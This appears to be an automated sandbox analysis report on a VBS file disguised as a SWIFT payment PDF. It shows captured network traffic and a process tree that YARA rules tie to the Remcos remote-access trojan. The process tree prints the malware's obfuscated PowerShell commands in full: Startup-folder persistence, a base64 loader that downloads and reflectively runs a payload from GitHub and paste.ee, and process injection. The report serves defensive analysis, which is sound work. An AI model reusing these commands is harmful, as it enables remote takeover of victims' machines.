                                                                                2024-10-04 09:34:18 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                147192.168.2.55562013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:18 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1371
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                ETag: "0x8DC582BED3D048D"
                                                                                x-ms-request-id: 4f10e0ef-e01e-0085-118c-15c311000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc554l9xf959gp9cb1s00000006dg000000008ye5
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                148192.168.2.55561913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:18 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1372
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                ETag: "0x8DC582BE6669CA7"
                                                                                x-ms-request-id: b9a1a970-401e-0078-528c-154d34000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc55tsfp92w7yna557w0000000ceg000000000uy7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                149192.168.2.55562213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:18 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:19 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1389
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE0F427E7"
                                                                                x-ms-request-id: b9d89a70-001e-008d-3b8c-15d91e000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc554l9xf959gp9cb1s00000006e0000000008ku2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:19 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:05:33:32
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs"
                                                                                Imagebase:0x7ff7e1bf0000
                                                                                File size:170'496 bytes
                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:05:33:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
                                                                                Imagebase:0x7ff7d4d80000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:05:33:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:05:33:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\PING.EXE
                                                                                Wow64 process (32bit):false
                                                                                Commandline:ping 127.0.0.1 -n 10
                                                                                Imagebase:0x7ff754b20000
                                                                                File size:22'528 bytes
                                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:05:33:42
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
                                                                                Imagebase:0x7ff7be880000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:05:33:45
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                Imagebase:0x7ff7be880000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:05:33:45
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:8
                                                                                Start time:05:33:45
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
                                                                                Imagebase:0x7ff7be880000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:10
                                                                                Start time:05:33:52
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                Imagebase:0xfc0000
                                                                                File size:43'008 bytes
                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:11
                                                                                Start time:05:33:52
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:12
                                                                                Start time:05:33:52
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:13
                                                                                Start time:05:33:55
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:14
                                                                                Start time:05:33:56
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff7e52b0000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:15
                                                                                Start time:05:33:56
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2360,i,8934632438909745951,2213681595228066499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:16
                                                                                Start time:05:34:00
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:17
                                                                                Start time:05:34:00
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:18
                                                                                Start time:05:34:00
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:19
                                                                                Start time:05:34:00
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2020,i,18065770690636922477,5919200967098741641,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:20
                                                                                Start time:05:34:04
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:21
                                                                                Start time:05:34:04
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1180,i,15662417021116800271,17959301878097503911,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
